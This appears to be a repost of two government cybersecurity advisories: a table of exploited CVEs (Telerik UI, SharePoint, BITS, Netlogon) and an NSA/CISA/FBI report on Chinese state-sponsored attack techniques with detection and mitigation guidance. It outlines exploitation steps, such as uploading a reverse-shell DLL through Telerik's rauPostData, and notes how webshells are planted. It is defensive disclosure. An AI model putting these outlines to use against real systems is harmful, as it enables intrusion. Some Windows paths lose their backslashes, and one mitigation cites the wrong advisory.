The Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable HTTP POST parameter rauPostData makes use of a vulnerable function/object AsyncUploadHandler. The object/function uses the JavaScriptSerializer.Deserialize() method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:

  1. Determining the vulnerable function is available/registered:  http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau,
  2. Determining if the version running is vulnerable by querying the UI, and
  3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.

There were two malware campaigns associated with this vulnerability:

  • Netwalker Ransomware and
  • Blue Mockbird Monero Cryptocurrency-mining.

Fix

Patch Available

Recommended Mitigations

  • Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later).

Detection Methods

  • ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.
  • Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in ACSC Advisory 2020-004.
  • Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

Telerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected.

References

 

Table 13: CVE-2019-0604 Vulnerability Details

Microsoft SharePoint Remote Code Execution (CVE-2019-0604)

Vulnerability Description

A vulnerability in an XML deserialization component within Microsoft SharePoint allowed remote attackers to execute arbitrary code on vulnerable Microsoft SharePoint servers.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

This vulnerability was typically exploited to install webshell malware to vulnerable hosts. A webshell could be placed in any location served by the associated Internet Information Services (IIS) web server and did not require authentication. These web shells would commonly be installed in the Layouts folder within the Microsoft SharePoint installation directory, for example:

C:Program FilesCommon FilesMicrosoft SharedWeb Server Extensions<version_number>TemplateLayouts

The xmlSerializer.Deserialize() method does not adequately sanitize user input that is received from the PickerEnitity/ValidateEnity (picker.aspx) functions in the serialized XML payloads. Once the serialized XML payload is deserialized, the XML code is evaulated for relevant XML commands and stings. A user can attack .Net based XML parsers with XMLNS payloads using the <system:string> tag and embedding malicious operating system commands. 

The exploit was used in malware phishing and the WickrMe/Hello Ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Upgrade on-premise installations of Microsoft Sharepoint to the latest available version (Microsoft SharePoint 2019) and patch level.
  • On-premise Microsoft SharePoint installations with a requirement to be accessed by internet-based remote staff should be moved behind an appropriate authentication mechanism such as a VPN, if possible.

Detection Methods

  • The patch level of on-premise Microsoft SharePoint installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft SharePoint security advisory.
  • Vulnerable SharePoint servers should be reviewed for evidence of attempted exploitation. ACSC Advisory 2019-125 contains advice on reviewing IIS HTTP request logs for evidence of potential exploitation.
  • NSA provides guidance on detecting and preventing web shell malware.

Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft SharePoint versions were affected: Microsoft Sharepoint 2019, Microsoft SharePoint 2016, Microsoft SharePoint 2013 SP1, and Microsoft SharePoint 2010 SP2.

References

 

Table 14: CVE-2020-0787 Vulnerability Details

Windows Background Intelligent Transfer Service Elevation of Privilege (CVE-2020-0787)

Vulnerability Description

The Windows Background Intelligent Transfer Service (BITS) is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.

CVSS 3.0

High

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have the ability to execute arbitrary code on a vulnerable Windows host.

Actors exploiting this vulnerability commonly used the proof of concept code released by the security researcher who discovered the vulnerability. If an actor left the proof of concept exploit’s working directories unchanged, then the presence of the following folders could be used as an indicator of exploitation:

C:Users<username>AppDataLocalTempworkspace
C:Users<username>AppDataLocalTempworkspacemountpoint
C:Users<username>AppDataLocalTempworkspacebait

The exploit was used in Maze and Egregor ransomware campaigns.

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of all Microsoft Windows installations should be reviewed for the presence of relevant security updates as outlined in the Microsoft BITS security advisory.

Vulnerable Technologies and Versions

Windows 7 for 32-bit and x64-based Systems Service Pack 1, 8.1 for 32-bit and x64-based systems, RT 8.1, 10 for 32-bit and x64-based Systems, 10 1607 for 32-bit and x64-based Systems, 10 1709 for 32-bit and x64-based and ARM64-based Systems, 10 1803 for 32-bit and ARM64-based and x64-based Systems, 10 1809 for 32-bit and ARM64-based and x64-based Systems, 10 1903 for 32-bit and ARM64-based and x64-based Systems, 10 1909 for 32-bit, and ARM64-based and x64-based Systems are vulnerable.

Windows Server 2008 R2 for x64-based Systems Service Pack 1, 2008 R2 for x64-based Systems Service Pack 1 (Server Core Installation), 2008 for 32-bit Systems Service Pack 2, 2008 for 32-bit Systems Service Pack 2 (Server Core Installation), 2012, 2012 (Server Core Installation), 2012 R2, 2012 R2 (Server Core Installation), 2016, 2016 (Server Core Installation), 2019, 2019 (Server Core Installation), 1803 (Server Core Installation), 1903 (Server Core Installation), and 1909 (Server Core Installation) are also vulnerable.

References

 

Table 15: CVE-2020-1472 Vulnerability Details

Netlogon Elevation of Privilege (CVE-2020-1472)

Vulnerability Description

The Microsoft Windows Netlogon Remote Protocol (MS-NRPC) reuses a known, static, zero-value initialization vector (VI) in AES-CFB8 mode, which could allow an unauthenticated attacker to impersonate a domain-joined computer including a domain controller, and potentially obtain domain administrator privileges.

CVSS 3.0

Critical

Vulnerability Discussion, IOCs, and Malware Campaigns

To exploit this vulnerability, an actor would first need to have an existing presence on an internal network with network connectivity to a vulnerable Domain Controller, assuming that Domain Controllers are not exposed to the internet.

The immediate effect of successful exploitation results in the ability to authentication to the vulnerable Domain Controller with Domain Administrator level credentials. In compromises exploiting this vulnerability, exploitation was typically followed immediately by dumping all hashes for Domain accounts.

Threat actors were seen combining the MobileIron CVE-2020-15505 vulnerability for initial access, then using the Netlogon vulnerability to facilitate lateral movement and further compromise of target networks.

A nation-state APT group has been observed exploiting this vulnerability.[18]

Fix

Patch Available

Recommended Mitigations

  • Apply the security updates as recommended in the Microsoft Netlogon security advisory.

Detection Methods

  • The patch level of Domain Controllers should be reviewed for the presence of relevant security updates as outlined in the Microsoft Netlogon security advisory.
  • Reviewing and monitoring Windows Event Logs can identify potential exploitation attempts. However, further investigation would still be required to eliminate legitimate activity. Further information on these event logs is available in the ACSC 2020-016 Advisory.

Vulnerable Technologies and Versions

At the time of the vulnerability release, the following Microsoft Windows Server versions were vulnerable: all versions of Windows Server 2019; all versions of Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; and Windows Server versions 1909/1903/1809.

References

 

For additional general best practices for mitigating cyber threats, see the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity and ACSC’s Essential Eight mitigation strategies.

Additional Resources

Free Cybersecurity Services

CISA offers several free cyber hygiene vulnerability scanning and web application services to help U.S. federal agencies, state and local governments, critical infrastructure, and private organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. For more information about CISA’s free services, or to sign up, email [email protected].

Cyber Essentials

CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices.

Cyber.gov.au 

ACSC’s website provides advice and information about how to protect individuals and families, small- and medium-sized businesses, large organizations and infrastructure, and government organizations from cyber threats.

ACSC Partnership Program

The ACSC Partnership Program enables Australian organizations and individuals to engage with ACSC and fellow partners, drawing on collective understanding, experience, skills, and capability to lift cyber resilience across the Australian economy.

Australian organizations, including government and those in the private sector as well individuals, are welcome to sign up at Become an ACSC partner to join.

NCSC 10 Steps

The NCSC offers 10 Steps to Cyber Security, providing detailed guidance on how medium and large organizations can manage their security.

On vulnerabilities specifically, the NCSC has guidance to organizations on establishing an effective vulnerability management process, focusing on the management of widely available software and hardware.

Source…

Chinese State-Sponsored Cyber Operations: Observed TTPs


This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 9, and MITRE D3FEND™ framework, version 0.9.2-BETA-3. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques and the D3FEND framework for referenced defensive tactics and techniques.

The National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People’s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China’s long-term economic and military development objectives.

This Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.

To increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors’ Observed Procedures. Note: NSA, CISA, and FBI encourage organization leaders to review CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders for information on this threat to their organization.

Click here for a PDF version of this report.

Trends in Chinese State-Sponsored Cyber Operations

NSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:

  • Acquisition of Infrastructure and Capabilities. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community’s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.

  • Exploitation of Public Vulnerabilities. Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability’s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:

  • Encrypted Multi-Hop Proxies. Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.

Observed Tactics and Techniques

Chinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable JSON file is also available on the NSA Cybersecurity GitHub page.

Refer to Appendix A: Chinese State-Sponsored Cyber Actors’ Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.

Figure 1: Example of tactics and techniques used in various cyber operations.

 

Mitigations

NSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:

  • Patch systems and equipment promptly and diligently. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle.
    Note: for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.

  • Enhance monitoring of network traffic, email, and endpoint systems. Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.
  • Use protection capabilities to stop malicious activity. Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary’s ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.▪

Resources

Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ for previous reporting on Chinese state-sponsored malicious cyber activity.

Disclaimer of Endorsement

The information and opinions contained in this document are provided “as is” and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Purpose

This document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see http://www.us-cert.gov/tlp/.

Trademark Recognition

MITRE and ATT&CK are registered trademarks of The MITRE Corporation. • D3FEND is a trademark of The MITRE Corporation. • Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. • Pulse Secure is a registered trademark of Pulse Secure, LLC. • Apache is a registered trademark of Apache Software Foundation. • F5 and BIG-IP are registered trademarks of F5 Networks. • Cobalt Strike is a registered trademark of Strategic Cyber LLC. • GitHub is a registered trademark of GitHub, Inc. • JavaScript is a registered trademark of Oracle Corporation. • Python is a registered trademark of Python Software Foundation. • Unix is a registered trademark of The Open Group. • Linux is a registered trademark of Linus Torvalds. • Dropbox is a registered trademark of Dropbox, Inc.

APPENDIX A: Chinese State-Sponsored Cyber Actors’ Observed Procedures

Note: D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.

Tactics: Reconnaissance [TA0043]    

Table 1: Chinese state-sponsored cyber actors’ Reconnaissance TTPs with detection and mitigation recommendations

Threat Actor
Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Active Scanning [T1595

Chinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft® 365 (M365), formerly Office® 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python® scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization’s fully qualified domain name, IP address space, and open ports to target or exploit.

Minimize the amount and sensitivity of data available to external parties, for example: 

  • Scrub user email addresses and contact lists from public websites, which can be used for social engineering, 

  • Share only necessary data and information with third parties, and 

  • Monitor and limit third-party access to the network. 

Active scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.

Detect: 

Isolate: 

Gather Victim Network Information [T1590]

 

Tactics: Resource Development [TA0042]

Table II: Chinese state-sponsored cyber actors’ Resource Development TTPs with detection and mitigation recommendations

Threat Actor
Technique / Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Acquire Infrastructure [T1583]

 

Chinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.

 

Adversary activities occurring outside the organization’s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.

 

N/A

Stage Capabilities [T1608]

Obtain Capabilities [T1588]: 

Chinese state-sponsored cyber actors have been observed using Cobalt Strike® and tools from GitHub® on victim networks. 

Organizations may be able to identify malicious use of Cobalt Strike by:

  • Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. 

  • Looking for the default Cobalt Strike TLS certificate. 

  • Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.

  • Review the traffic destination domain, which may be malicious and an indicator of compromise.

  • Look at the packet’s HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.

  • Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike’s malleable C2 language. If discovered, additional recovery and investigation will be required.

 

N/A

Tactics: Initial Access [TA0001]

Table III: Chinese state-sponsored cyber actors’ Initial Access TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Detection and Mitigation Recommendations

Drive By Compromise [T1189]

Chinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.

  • Ensure all browsers and plugins are kept up to date.
  • Use modern browsers with security features turned on.
  • Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript®, restrict browser extensions, etc.
  • Use adblockers to help prevent malicious code served through advertisements from executing. 
  • Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. 
  • Use browser sandboxes or remote virtual environments to mitigate browser exploitation.
  • Use security applications that look for behavior used during exploitation, such as Windows Defender® Exploit Guard (WDEG).

Detect: 

  • Identifier Analysis
  • File Analysis

Isolate: 

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Executable Allowlisting [D3-EAL]
  • Network Isolation

Exploit Public-Facing Application [T1190]

Chinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[1] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources.
Chinese state-sponsored cyber actors have also been observed:

  • Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange® Outlook Web Access (OWA®) and plant webshells.

  • Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.

  • Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.

Review previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.

Additional mitigations include:

  • Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.
  • Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).
  • Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.
  • Disable protocols using weak authentication.
  • Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [Embracing a Zero Trust Security Model].
  • When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).
  • Use automated tools to audit access logs for security concerns.
  • Where possible, enforce MFA for password resets.
  • Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.

Harden:

  • Application Hardening [D3-AH]
  • Platform Hardening

Detect:

  • File Analysis [D3-FA
  • Network Traffic Analysis
    • Client-server Payload Profiling [D3-CSPP]
  • Process Analysis 
    • Process Spawn Analysis
    • Process Lineage Analysis [D3-PLA]

Isolate: 

  • Network Isolation
    • Inbound Traffic Filtering [D3-ITF]

Phishing [T1566]: 

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. 
These compromise attempts use the cyber actors’ dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment. 

  • Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.
  • Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.
  • Block uncommon file types in emails that are not needed by general users (.exe, .jar,.vbs)
  • Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.
  • Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
  • Prevent users from clicking on malicious links by stripping hyperlinks or implementing “URL defanging” at the Email Security Gateway or other email security tools.
  • Add external sender banners to emails to alert users that the email came from an external sender.

Harden: 

  • Message Hardening
    • Message Authentication [D3-MAN]
    • Transfer Agent Authentication [D3-TAAN]

Detect: 

  • File Analysis
  • Identifier Analysis
  • Message Analysis
    • Sender MTA Reputation Analysis [D3-SMRA]
    • Sender Reputation Analysis [D3-SRA]
       

External Remote Services [T1133]

Chinese state-sponsored cyber actors have been observed:

  • Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.

  • Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).

  • Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including net, asp, apsx, php, japx, and cfm

Note: refer to the references listed above in Exploit Public-Facing Application [T1190] for information on CVEs known to be exploited by malicious Chinese cyber actors.

Note: this technique also applies to Persistence [TA0003].

  • Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.
  • Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.
  • Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).
  • Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.
  • Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.
  • Review and verify all connections between customer systems, service provider systems, and other client enclaves.

Harden:

Detect:

  • Network Traffic Analysis
    • Connection Attempt Analysis [D3-CAA]
  • Platform Monitoring [D3-PM]
  • Process Analysis
    • Process Spawn Analysis [D3-SPA
      • Process Lineage Analysis [D3-PLA]

Valid Accounts [T1078]:

Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.

Note: this technique also applies to Persistence [TA0003], Privilege Escalation [TA0004], and Defense Evasion [TA0005].

  • Adhere to best practices for password and permission management.
  • Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage 
  • Do not store credentials or sensitive data in plaintext.
  • Change all default usernames and passwords.
  • Routinely update and secure applications using Secure Shell (SSH). 
  • Update SSH keys regularly and keep private keys secure.
  • Routinely audit privileged accounts to identify malicious use.

Harden: 

  • Credential Hardening
    • Multi-factor Authentication [D3-MFA]

Detect:

  • User Behavior Analysis [D3-UBA]
    • Authentication Event Thresholding [D3-ANET
    • Job Function Access Pattern Analysis [D3-JFAPA]

Tactics: Execution [TA0002]

Table IV: Chinese state-sponsored cyber actors’ Execution TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques

Threat Actor Procedure(s)

Detection and Mitigation Recommendations

Defensive Tactics and Techniques

Command and Scripting Interpreter [T1059]: 

Chinese state-sponsored cyber actors have been observed:

  • Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).

  • Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. 

  • Employing Python scripts to exploit vulnerable servers.

  • Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux® servers in the victim network.

PowerShell

  • Turn on PowerShell logging. (Note: this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)

  • Push Powershell logs into a security information and event management (SIEM) tool.

  • Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.

  • Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.

  • Remove PowerShell if it is not necessary for operations. 

  • Restrict which commands can be used.

Windows Command Shell

  • Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. 

  • Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. 

  • Monitor for and investigate other unusual or suspicious scripting behavior. 

Unix

  • Use application controls to prevent execution.

  • Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. 

  • If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. 

Python

  • Audit inventory systems for unauthorized Python installations.

  • Blocklist Python where not required.

  • Prevent users from installing Python where not required.

JavaScript

  • Turn off or restrict access to unneeded scripting components.

  • Blocklist scripting where appropriate.

  • For malicious code served up through ads, adblockers can help prevent that code from executing.

Network Device Command Line Interface (CLI)

  • Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.

  • Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.

  • Ensure least privilege principles are applied to user accounts and groups.

Harden: 

Detect: 

Isolate:

Scheduled Task/Job [T1053]

Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks.

Note: this technique also applies to Persistence [TA0003] and Privilege Escalation [TA0004].

•    Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity.
•    Configure event logging for scheduled task creation and monitor process execution from svchost.exe (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in %systemroot%System32Tasks that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities—such as PowerShell or Windows Management Instrumentation (WMI)—that do not conform to typical administrator or user actions. 

Detect: 

  • Platform Monitoring
    • Operating System Monitoring [D3-OSM]
      • Scheduled Job Analysis [D3-SJA]
      • System Daemon Monitoring [D3-SDM]
      • System File Analysis [D3-SFA]

Isolate: 

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]

User Execution [T1204]

Chinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim’s device after the user clicks on the malicious link or opens the attachment.

  • Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.
  • Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
  • Use a domain reputation service to detect and block suspicious or malicious domains.
  • Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
  • Ensure all browsers and plugins are kept up to date.
  • Use modern browsers with security features turned on.
  • Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.

Detect: 

  • File Analysis
  • Identifier Analysis
  • Network Traffic Analysis

Isolate: 

  • Execution Isolation
    • Hardware-based Process Isolation [D3-HBPI]
    • Executable Allowlisting [D3-EAL]
  • Network Isolation

Tactics: Persistence [TA0003]

Table V: Chinese state-sponsored cyber actors’ Persistence TTPs with detection and mitigation recommendations

Threat Actor Technique /
Sub-Techniques
Threat Actor Procedure(s) Detection and Mitigation Recommendations Defensive Tactics and Techniques

Hijack Execution Flow [T1574]: 

Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. 

Note: this technique also applies to Privilege Escalation [TA0004] and Defense Evasion [TA0005].

  • Disallow loading of remote DLLs.
  • Enable safe DLL search mode.
  • Implement tools for detecting search order hijacking opportunities.
  • Use application allowlisting to block unknown DLLs.
  • Monitor the file system for created, moved, and renamed DLLs.
  • Monitor for changes in system DLLs not associated with updates or patches.
  • Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).

Detect: 

  • Platform Monitoring
    • Operating System Monitoring
      • Service Binary Verification [D3-SBV]
  • Process Analysis
    • File Access Pattern Analysis [D3-FAPA]

Isolate: 

  • Execution Isolation
    • Executable Allowlisting [D3-EAL]

Modify Authentication Process [T1556]

Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network.
Note: this technique also applies to Defense Evasion [TA0005] and Credential Access [TA0006].

  • Monitor for policy changes to authentication mechanisms used by the domain controller. 
  • Monitor for modifications to functions exported from authentication DLLs (such as cryptdll.dll and samsrv.dll).
  • Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. 
  • Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours). 
  • Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
  • Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.

Detect: 

  • Process Analysis [D3-PA]
  • User Behavior Analysis
    • Authentication Event Thresholding [D3-ANET]
    • User Geolocation Logon Pattern Analysis [D3-UGLPA]  

Server Software Component [T1505]: 

Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks. 

  • Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
